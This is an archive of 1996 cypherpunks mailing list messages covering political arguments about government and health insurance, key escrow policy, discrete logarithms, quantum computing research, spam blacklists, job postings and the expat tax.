But all governments are so GOOD and wholesome...how could they EVER 
do anything that their ppl did not like 100% ;)


> Your faith in big government, despite seemingly every bit of evidence 
> possible to the contrary, astounds me sometimes. Churches, Mosques, etc. 
> struggle mightily for this kind of thought pattern in believers, yet it 
> comes to you naturally, in secular life. Truly a marvel, and on _this_ list, 
> of all places. It has kept me from killfiling you, but I must occasionally 
> express my awe at the power of faith to literally move mountains. There is a 
> "regulation" (law) against [murder, selling/growing reefer, selling sexual 
> services, assault, you name it] yet you'd never deny that these behaviors 
> still exist, would you? Somehow, though, you still seem to manage to think 
> that spamming slimeballs will just disappear with more regulations. It's 
> astonishing.
> 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 18 Sep 1996 16:29:22 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie Hellman - logs in Galois fields
In-Reply-To: <842988785.23058.0@fatmans.demon.co.uk>
Message-ID: <7y5euD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


>From paul@fatmans.demon.co.uk  Tue Sep 17 16:14:54 1996
Received: by bwalk.dm.com (1.65/waf)
	via UUCP; Tue, 17 Sep 96 16:29:31 EDT
	for dlv
Received: from disperse.demon.co.uk by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP;
        id AA19740 for dlv@bwalk.dm.com; Tue, 17 Sep 96 16:14:54 -0400
Received: from post.demon.co.uk ([(null)]) by relay-2.mail.demon.net  id ay20804;
          17 Sep 96 20:55 BST
Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net
           id aa23058; 17 Sep 96 20:33 BST
Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP 
	id AA842988795 ; Tue, 17 Sep 96 19:33:15 +0000
Comments: Authenticated sender is <paul@fatmans.demon.co.uk>
From: paul@fatmans.demon.co.uk
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Date: Tue, 17 Sep 1996 19:33:09 +0000
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7BIT
Subject: Re: Diffie Hellman - logs in Galois fields
Cc: cypherpunks@toad.com
Priority: normal
X-Mailer: Pegasus Mail for Windows (v2.31)
Message-Id: <842988785.23058.0@fatmans.demon.co.uk>


> I think polluting this mailing list with trivial questions such as this is
> just as bad as polluting it with personal attacks. Read the FAQs.

Get a fucking life, seeing as you haven`t yet posted anything 
relating remotely to the technical aspects of cryptography to this 
list I think you need to take a long hard look at what your saying 
loser....

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Wed, 18 Sep 1996 14:53:12 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: Risk v. Charity (was: RE: Workers Paradise. /Political rant
In-Reply-To: <199609171531.BAA22478@suburbia.net>
Message-ID: <Pine.SUN.3.91.960917175926.8664L-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Clearly, we must have only professional political views here.

-Declan



On Wed, 18 Sep 1996, Julian Assange wrote:

> > And what am I paying for...to protect the status quo. I believe that 
> > there is more than enough help for ppl available. They just need to 
> > get off their butts and work.
> 
> Do we really need your amatuer political views?
> 
> -- 
> "Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
>  may be the most  oppressive.  It may be better to live under  robber barons  
>  than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
>  sometimes sleep,  his cupidity may at some point be satiated; but those who  
>  torment us for own good  will torment us  without end,  for they do so with 
>  the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
> +---------------------+--------------------+----------------------------------+
> |Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
> |proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
> |proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
> +---------------------+--------------------+----------------------------------+
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 12:06:22 +0800
To: cypherpunks@toad.com
Subject: Re: The Expat Tax Is Law - The Door Is Now Closed!
Message-ID: <ae649a04060210044a2f@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:20 PM 9/17/96, Duncan Frissell wrote:
>At 05:11 AM 9/17/96 -0700, Tim May wrote:
>
>>It makes me want to just put my stock certificates in my luggage and just
>>drive on down to Mexico and cross the border (no border checks) and go
>>from there to some safer haven.
>>
>>(However, I imagine the Feds can effectively block sales of my stock--the
>>stock is still formally only an accounting entry, as stock certificates
>>are not "bearer instruments." I could probably relocate to a foreign haven
>>and sell the assets before the IRS would even notice...unless they
>>computerize. I suspect this is coming.)
>
>But since a 10-year old (who is willing to break the law) can defeat their
>expat tax, what difference does it make.  All one has to do is cash out,
>transfer all funds overseas, follow them, and renounce.  Move the funds
>around a little.  It's not tax fraud (no false documents have been uttered
>-- indeed no documents at all).  Just take your marbles and go home.


While I've always admired your "in-your-face" approach to tax matters, I
remain skeptical.

What I expect will happen is some variant of "witholding" to be
implemented, where one's "transfer agent" (the holder of one's actual
stock, regardless of who holds the paper certificates) releases only, say,
60% of the proceeds from a sale and holds the remaining 40% for eventual
settlement of taxes.

(Much as one's employer "witholds" a percentage, ranging up to 50% or so,
for Federal, State, and FICA taxes.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 18 Sep 1996 10:03:32 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Politica...
Message-ID: <9608178430.AA843010044@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@schloss.li> wrote:
>On Tue, 17 Sep 1996 jbugden@smtplink.alis.ca wrote:
>> Black Unicorn <unicorn@schloss.li>
>> >You are saying that everyone on the planet has a right to health
>> > insurance and disability insurance whether they can afford it or not.
>> > This is folly.  The result is serious moral hazard problems.
>> 
>> Almost, but not quite. I'm saying that within our two countries at least
>> (Canada, U.S.) everyone could have access to medically necessary
>> procedures because the *society as a whole* can afford it.
>
>The decisions about what is or is not medically necessary must by
>design be made by government in a socialized medicine regime.

People do make decisions that affect other people. If you feel safer in the good
hands of Allstate than at the government trough, good for you.

Personally, I trust in Allah, but I still tie up my camel. 

> This evades an important point as well.  Namely, who cares if society
> can afford it?

Some things are seen as investments in the future of a society. I view both
Education and Health through this lens.

>> But there is a balance between accurately pricing the risk and
>> minimizing the cost of the bureacracy that polices this pricing. 
>
> Oh, I see.  Let's give the program to the government then.  Good idea.
> That will reduce the cost of the bureacracy.

The point is still valid. Are we not trying to minimize this cost?

>> There are also many ways to modify behaviour, not all of them direct. 
>
> And all of them buy into the notion that people are not to be made
> personally responsible for their high risk behavior.

There it is again. Blame the sick for their lack of moral fibre.

Not every victim of lung cancer smokes. Besides, people are notoriously poor at
evaluating the probability of unlikely events (see reference below). A
"punishment" that happens 30 years after the "crime" is no deterrent. Prevention
is usually cheaper than treatment. 

> I prefer market solutions.

I prefer solutions.
James




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: steve@tsearch.com (Steve Dyson)
Date: Wed, 18 Sep 1996 13:02:01 +0800
To: cypherpunks@toad.com
Subject: Systems/Communications Security Positions in the South Bay
Message-ID: <v0213052fae649f1dbfdc@[206.79.49.12]>
MIME-Version: 1.0
Content-Type: text/plain


I know someone is going to get PO'd about this, but I didn't know how else
to get these in front of you in a timely manner. These positions are
critical and interesting parties can interview next week, please read on:

---------------

One of the Nation's leaders in Systems and Communications security is
seeking several talented engineers to join their South Bay
Development/Consulting facility to develop Internet/WWW Commerce Software.

As a Software Developer on this project you will be responsible for the
development of Electronic Commerce Software that spans the World Wide Web,
e-mail, distributed applications, security, cryptography, O/S security, and
Internet protocols.

Qualified candidates should be experienced system software developers with
three years development experience including several of the following
areas: Unix, NT, TCP/IP, network protocol development, distributed
application development, applied cryptography.

For more information on this and other opportunities send a resume/email to
steve@tsearch.com

--------------------------

2. One of the Nation's leaders in Systems and Communications security is
seeking several talented engineers to join their South Bay
Development/Consulting facility to develop Distributed, CORBA-compliant
Software.

As a Software Developer on this team you will join a new project spanning
distributed object applications, CORBA ORB services, CORBA security, O/S
security, a network protocol development. An existing
high security O/S's distributed system capabilities are being extended to
provide object request brokerage. New security components for
access-controled inter-ORB interoperability are being developed. New and
existing security mechanisms are being integrated for these components.

This position requires strong system software development experience with
at at least three years development experience including several of the
following areas: CORBA, Unix, firewalls, TCP/IP, network protocol
development, object-oriented software development, distributed application
development, Mach, Kerberos, DCE, trusted systems, multi-level security.

For more information on this and other opportunities send a resume/email to
steve@tsearch.com

--------------------

3. One of the Nation's leaders in Systems and Communications security is
seeking several talented engineers to join their South Bay
Development/Consulting facility as Network Security Consultants. There are
4 positions requiring 2-4, 4-6 (2), and 6+ years of experience
respectively.

As a Network Security Consultant you will:
- discuss network configuration and hacker threats with system
administrators
- understand issues related to network security policies and procedures
- identify effective approaches to security issues of multi-platform
systems, corporate LANs, and Internet systems
- identify, understand, and effectively communicate risks, and tradeoffs
between security requirements and user productivity and system performance
- provide input for training materials that address customers' specific
policies, network configuration, and risks
- operate independently to perform customer relations and project
management for some projects, including primary responsibility for written
deliverables
- provide oversight for a number of projects managed by others,
- perform business development and expand customer base, with assistance
  from junior colleagues.

These positions require strong system software development experience with
UNIX and NT platforms, as well as some of the following:
network protocols, firewalls, network security vulnerabilities,
applied cryptography, access control, risk assessment, security policies.

For more information send a resume/email to steve@tsearch.com



]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
Steve Dyson                             Technology Search International
Consultant                                 25 Metro Drive, STE 238
steve@tsearch.com              San Jose, CA 95110
VOICE 408.437.9500            FAX 408.437.1033

"...dockin-doid, dockin-doid.........dockin- doid"
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 12:47:36 +0800
To: cypherpunks@toad.com
Subject: Re: Anthrax on the 'net [Was Re: Fear of Flying -- from HotWired ]
Message-ID: <ae649f3407021004825a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:14 PM 9/17/96, Mike Fletcher wrote:

>        The Frank Herbert (of _Dune_ fame) book _White Plague_ comes
>to mind.  Basically a molecluar biologist's wife and kids are killed
>by an IRA bomb while visiting Dublin.  He snaps and creates a plague
>which kills women (men are carriers) as revenge.  All without using
>that nasty Internet (in fact, the book was written back before even
>ARPAnet).

A _very_ minor correction. My copy of "The White Plague" is not handy, but
I distinctly recall reading it circa 1980-1, certainly no earlier than
1977-8.

The ARPANet was going strong by then.

Newsgroups were getting started around 1980, give or take, as I recall.

But of course I agree that "The White Plague" was written long before "The
Net" became a household name. (Interestingly, Herbert was
computer-literate, and he even wrote a book about using PCs, circa the late
70s....something like "Nailing Jelly to a Tree.")

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 18 Sep 1996 14:13:00 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: Diffie Hellman - logs in Galois fields
In-Reply-To: <842896368.27767.0@fatmans.demon.co.uk>
Message-ID: <199609180148.SAA28173@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>A question for the matematicians out there:

heh. I'll answer anyway.

>My maths tutor has told me a bit about the construction of Galois 
>fields (If I`m correct the construction is Z mod N, N some integer, 
>then a transformation F(x) on the residue classes already in the 
>field) I know also the definition is that there are P**k elements, p 
>a prime.

what is 'k'? there are N elements in the field as I understand
the terminology.

>1. How can a field be finite, as by definition it has to be closed 
>under addition, subtraction, multiplication and division???? (sorry 
>if this one is a bit of a no brainer, maybe the definition is 
>different but I can`t seem to see how)

the short answer is that all the operations are redefined
somewhat to analogous operations that map into the range of integers.
division is not defined for results that are not integers.
actually division is replaced with an operation called "finding
the inverse mod n".

>2. Why is taking logs in a finite field computationally hard? - Me 
>and Alec (My maths tutor at college) guessed that it is because 
>exponentiation and logs are each others inverse functions, and 
>somehow this becomes a one way function in a finite field.

actually, this is a very important question that already gets
to the limits of current knowledge. the short answer
is that there is *no*proof* that this problem is "hard". in
fact such proofs are somewhat rare and exist mostly for contrived
problems. in computational theory what one does is prove that
your problem is at least as difficult as some other famous
problem that many people have tried to find efficient solutions
but have failed. this is called "NP Complete". as far as I know
there is no proof that "taking logs in a finite field" is
actually "hard". in fact there is no proof that factoring (an
equivalent form of the problem) is "hard" or even a proof that it is np 
complete.


most of this stuff is in the cryptography faq out there in
cyberspace. I am writing in hopes that someone might amend
the above by posting the latest academic thinking on the difficulty 
of factoring.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 14:24:34 +0800
To: cypherpunks@toad.com
Subject: The Near-Necessity of Health Insurance
Message-ID: <ae64a320080210046e61@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:49 PM 9/17/96, Simon Spero wrote:

>I wouldn't be so proud of the US health care system; the actual quality
>of care is really pretty awful, even with insurance. Even though the
>NAtional Health Service in the uK is woefully underfunded, I've always
>had much better treatment than I have from HMOs here; even seeing a
>specialist privately, at home, with no insurance, is cheaper than getting
>an X-Ray looked at by someone who once met a radiologist a cocktail
>party.
...
>There are ideological reasons that argue  for rejecting  such
>compulsory schemes  based on that element of coercion; it's hard to
>make the case against purely on efficiency grounds.

Personally, I have not been a patient in a hospital in my entire adult
life. Nor have I seen a doctor, except for a mandatory college physical in
1970 and an insurance company physical in 1977. I just haven't broken any
bones, had any serious illnesses, or felt the need to visit a doctor, an
emergency room, or a walk-in clinic of any sort. I suppose I've been lucky.
Also, I dislike hospitals and avoid doctors unless there seems to be a
compelling need. So far, there has not been.

And, no, I don't have any health insurance of any kind.

However, I am thinking about getting some. Not so much because I'm getting
older, but because I fear a new phenomenon: hospital emergency rooms
refusing admittance of patients unless they can present the proper
patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross,
Kaiser, or whatever).

My dentist's receptionist/bill handler already seems flustered that I am
paying my dental bills with a check, rather than giving her my insurer's
account number.

I also learned from a "60 Minutes" report, since confirmed elsewhere, that
large hospitals routinely negotiate large discounts with large insurers,
e.g., Blue Shield, so that while the "list price" of a typical day in a
hospital may be an exorbitant $1800 a day ($30 for an aspirin, $75 for the
lights-out bed check, etc...it all adds up!), Blue Shield has negotiated a
fee of less than a third of that....

In other words, the person who insures himself (through savings and
investments) and who offers to pay for treatment out of his own funds, may
be at a serious disadvantage. He pays the inflated rates for services, and
may face delays in being admitted to a hospital.

(This space reserved for Duncan and others to explain how one can offer to
pay in Krugerrands and to negotiate with the hospital on the spot. Meaning
no disrespect to Duncan, but I doubt it is this easy. The mind-set of
hospitals seems to be that anyone without a valid patient-unit card is
obviously a derelict and indigent. And while all hospitals are required to
accept derelicts and indigents in suitable emergencies--not a law I agree
with--it is not desirable that one be treated as a derelict and
undesirable. I hope I am conscious enough to give the admitting staff my
financial health information.)

Anyway, I'm thinking of finally bowing to the inevitable and starting to
fork out $200-300 a month for health care I am unlikely to routinely use.

(Obviously the folks who use their insurance routinely, as one of my
engineers once used to do (he'd take his kids to the hospital every time
they sneezed), are being subsidized by those of us who avoid hospitals at
all costs.)

I'm not arguing for national health care, just noting that we effectively
are getting it, between the "Poor People" having subsidized care and the
"Rest of Us" in employer-funded or private health care plans.

Cash is already dead at most hospitals.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 18 Sep 1996 14:32:42 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: The GAK Momentum is Building...
In-Reply-To: <Pine.3.89.9609162221.A17615-0100000@netcom14>
Message-ID: <199609180201.TAA29368@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



again, more black/white cpunk thought that goes along the lines,
"unless we have won everything, we have lost everything".

you guys are awfully cynical. clipper has failed its original
objectives by miles. the last-ditch efforts by bureacrats to
get some semblance of "key escrow" from recent developments
are increasingly pathetic.

I'd say the significant dilution of clipper over the years
is a very strong victory for pro-privacy, pro-cryptography
advocates.

the Clipper proposals are increasingly moving into the
area of "key management". large companies will always
want key management features, to deal with employees who
forget passwords, leave the company, etc.-- face it, this
is a simple reality. essentially all the latest
moves amount to, imho, is the government trying to get
its fingers into these key management infrastructures.

so the recent stuff that is emerging, I would hesitate
to call "gak". it sounds more like "gaki", or government
access to key infrastructures. these infrastructures are
going to be built up regardless of what cpunks wish-- 
private businesses simply must have them. frankly all it
looks like to me is the government saying, "we reserve
the right to subpoena keys". this will always be the case.
bureacrats are always trying to pass new laws when old
ones already apply.

>It is a done deal,
>--Lucky, who told you this three years ago.

again, more simplistic summaries. there is a whole range of
evil proposals that the government could be involved in, and
we have to begin to discriminate between them. the government
could be the sole manager of all key infrastructures and the
entity that licenses all crypto for any use-- that
I would consider total worse case reality.  or the government
could have tentacles stuck into key infrastructures that
businesses build up. the latter is not quite as odious or
threatening. in fact it simply sounds like the government
saying, "we reserve the right to subpoena keys". (of course
the latter could always evolve into the former. I suppose
the cynics would contend that it is inevitable.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John K Clark <johnkc@well.com>
Date: Wed, 18 Sep 1996 13:11:49 +0800
To: cypherpunks@toad.com
Subject: Quantum Computers
Message-ID: <199609180209.TAA16547@well.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In the April 12 1996 issue of Science there is an article on
Quantum  Computers. It makes clear that a practical Quantum Computer 
has not been proven to be possible, nevertheless the article had a 
very optimistic tone, an optimism I did not see just one year ago. 
If such a machine could be built the ramifications are mind boggling.

When a conventional 64 bit single processor computer performs an
operation, it does it on ONE 64 bit number at a time. When a 64
bit (actually a 64 qubit) single processor QUANTUM computer
performs an operation it does it on ALL 64 bit numbers at the
same time, all 2^64 of them, more than a billion billion, 
and any increase in the number of qubits the computer can handle
will increase it's already astronomical power exponentially. 

It gets even wilder, because the quantum mechanical state of the
matter in the machine's memory determines the output, Seth Lloyd 
of MIT thinks you could run the machine in  reverse and the result 
would be a quantum mechanical micromanipulator.

Despite this enormous increase in performance and a possible
short cut to Nanotechnology, most weren't very interested because 
it didn't seem like a  Quantum Computer could ever be built. 
The slightest error or interaction with the outside environment would 
render the machine inoperative, conventional error correcting codes 
don't work for in the quantum domain and most said that correcting codes 
for quantum mechanical information was impossible. 
They were wrong.

Late last year Peter Shor of ATT showed how to encode a piece of
quantum  information in a 9 qubit system so that the information
is retained even if there is an error in one of the 9 qubits. 
A few months later researchers at IBM refined Shor's technique so that 
only 5 qubits was needed, and found  ways to correct for multiple errors. 
 
The trouble was, although Shor's idea worked  well for storing and 
transmitting quantum information without error, it did not work for the 
actual calculation, many thought that surely was impossible. 
It turns out they were wrong about that too.

In the August 30 1996 issue of Science is an article by J. I. Cira,  
T. Pellizzari, and P. Zoller entitled "Enforcing Coherent Evolution In  
Dissipative Quantum Dynamics". They propose a Quantum error correcting scheme 
with modest computational overhead that would dramatically increase the 
number of quantum logic gates the machine could have before errors made it 
unreliable. If p is probability that a single gate will fail, then without 
error correction a Quantum Computer can only have 1/p gates as a practical 
matter. With this new quantum error correcting code it can have 4/p^2 gates 
before errors overwhelm it. For example, if the probability that one gate 
will fail is .09 then if you have no error correction your Quantum Computer
better not have more that 11 logic gates, with this new error correcting idea 
it could have 494 logic gates without making more errors than the 11 did. 
 
Until very recently the only useful program known to be able to run on these 
machines was one to factor large numbers for code breaking. Unfortunately 
there are problems, to factor a 100 digit number the machine would need to 
perform millions of quantum logical operations without being effected by the 
outside environment, even with the newly discovered quantum error correcting 
codes that would not be easy to do, not for that many operations. In the 
August 23 1996  Science is a fascinating research article by Seth Lloyd called 
"Universal  Quantum Simulators". Lloyd has found a way for quantum computers 
to do something far, FAR, more useful than factoring numbers, and is much 
easier for the machines to do too.
                
In quantum mechanics it's often possible in theory to predict what something  
will do but not in practice because of computational complexity, that's why 
Chemists must still perform experiments. To simulate the behavior of N 
electrons, in a conventional computer you would need memory space and 
computation time proportional to 2^2N. Just to figure out what's going on with 
40 electrons, like those found in a medium sized  atom, you would need to 
perform 10^24 operations. It's no wonder that Chemists keep their test tubes.
 
Lloyd found a way to perform the same simulation using just N quantum bits 
(qubits) and the number of operations the quantum machine  must do is  
proportional to N, not 2^2N as on a conventional computer. In addition, the 
time required to do the simulation over time t is proportional to t, in other 
words it can do it in real time, like an Analog computer. A very important
feature of Lloyd's algorithm is that it doesn't demand that the Quantum 
computer be a perfect machine that is totally isolated from the environment, 
it easily deals with errors. Incredibly, noise from the environment and 
decoherence can be useful to the computer, it can actually help it simulate 
noise and decoherence in the system it's simulating.
   
This may help put a stop to all the "End Of Science" books we've been seeing 
lately. People were saying that it was a waste of time to try to find a 
quantum theory of gravity because there would be no way to test it. It would  
be a HUGE calculation, but a thousand qubit quantum computer could do it.  
Lloyd says we could make a Quantum Computer today with a few tens of qubits
and it would "require only minor modifications of current technology". 
I'd say that's a pretty good start. He also says "The wide variety of atomic, 
molecular, and semiconductor quantum devices available suggests that quantum 
simulation may soon be a reality".
 
In a separate development, Lov K Grover of ATT recently found a way for a  
Quantum Computer to find a piece of information in a random list with N items 
in just the square root of N steps, not 1/2 N steps, which is the  average if 
you do this on a conventional computer.
   
Apparently the appeal of making a calculation on 2^n numbers at the same time  
with a machine that only has n qbits is too strong for the military to ignore.  
In the same issue of Science is an article about the defense department  
making a 5 million dollar grant to start an institute for Quantum Information  
and Computing (QUIC).  It's charter has 5 aims.

1) Improve quantum algorithms.
2) Improve quantum logic gates. 
3) Improve the architecture of Quantum Computers. 
4) Improve quantum error correcting codes.
5) Study the general theory behind quantum computation.
                      
I find all this very exciting, it must have been like this in
the late 1930's when reports trickled in about nuclear fission
and the idea occurred to people that a bizarre device like a
nuclear bomb might actually be able to exist in the real world.
                                                

                                             John K Clark     johnkc@well.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCzAgUBMj9UEH03wfSpid95AQGa4wTwubIy9BE9emWFU1DVaDL7+o7p5Z86OVah
iBd3OKgONhJUmodDz5Egq7dwzqLvS2Rc5BQ7UPmT5uezzE/6wxmVDRAqxjJFKWHa
1TJtSv94d/S5HA8RjaAMWpOPOKQUf0KILy+jfoQMrpCLFd0cKM+aQUyhExPN92A7
EyIDQ3RUnAJNYR5JVXUVcEsiDVuPney56ZwkOqx1KAhuTI/Bcdg=
=AKnq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 18 Sep 1996 13:38:36 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Spam blacklist project
Message-ID: <3.0b19.32.19960917191100.0069a12c@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 PM 9/17/96 -0400, Rabid Wombat wrote:

>I'd say it's a safe bet that the unscrupulous could easily sell a large, 
>up-to-date list of email addresses of people who DON'T want junk email to 
>people who want to send such mail.

That's why the list should be distributed (as the original poster
mentioned) in hashed format - the junk email people would then hash their
own list(s), and would know not to send to addresses where the hashes
matched. The unmatched hashes addresses on the "block" list aren't
otherwise useful to the junk e-mail folks. 

It's an interesting idea .. but who is going to pay for it? (doh.) 


--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Wed, 18 Sep 1996 13:03:37 +0800
To: "Brock N. Meeks" <brock@well.com>
Subject: Re: All Bets Off
In-Reply-To: <Pine.3.89.9609161420.A11988-0100000@well.com>
Message-ID: <9609171918.aa03723@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> Just so this isn't hanging in cyberspace forever, my $5,000 bet for 
> anyone to prove the TWA 800 flight was downed by a U.S. missile is now 
> *off the table*.  

I heard through  the family grapevine that they have pictures of a Stinger
taking out the plane they're analyzing in the Pentagon.  There are 220+
Stingers *missing* in the US, so its not like they have to smuggle them
in...  (That's not proof by any means, but *my* family grapevine has always
been very reliable.  The cousin who told me this has a Dad who flew as
the intelligence officer observer on Bronco flights out of Quang Tri for
18 months, rotating out just before the base was over run in May of '72.) 
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
*** O U T L A W S  On The  E L E C T R O N I C  F R O N T I E R ****
US Out Of Cyberspace!!! Join EFF Today! *email <membership@eff.org>*   




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 18 Sep 1996 13:21:26 +0800
To: cypherpunks@toad.com
Subject: Re: The Expat Tax Is Law - The Door Is Now Closed!
Message-ID: <3.0b19.32.19960917191959.00e3a694@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:11 AM 9/17/96 -0700, Tim May wrote:

>It makes me want to just put my stock certificates in my luggage and just
>drive on down to Mexico and cross the border (no border checks) and go
>from there to some safer haven.
>
>(However, I imagine the Feds can effectively block sales of my stock--the
>stock is still formally only an accounting entry, as stock certificates
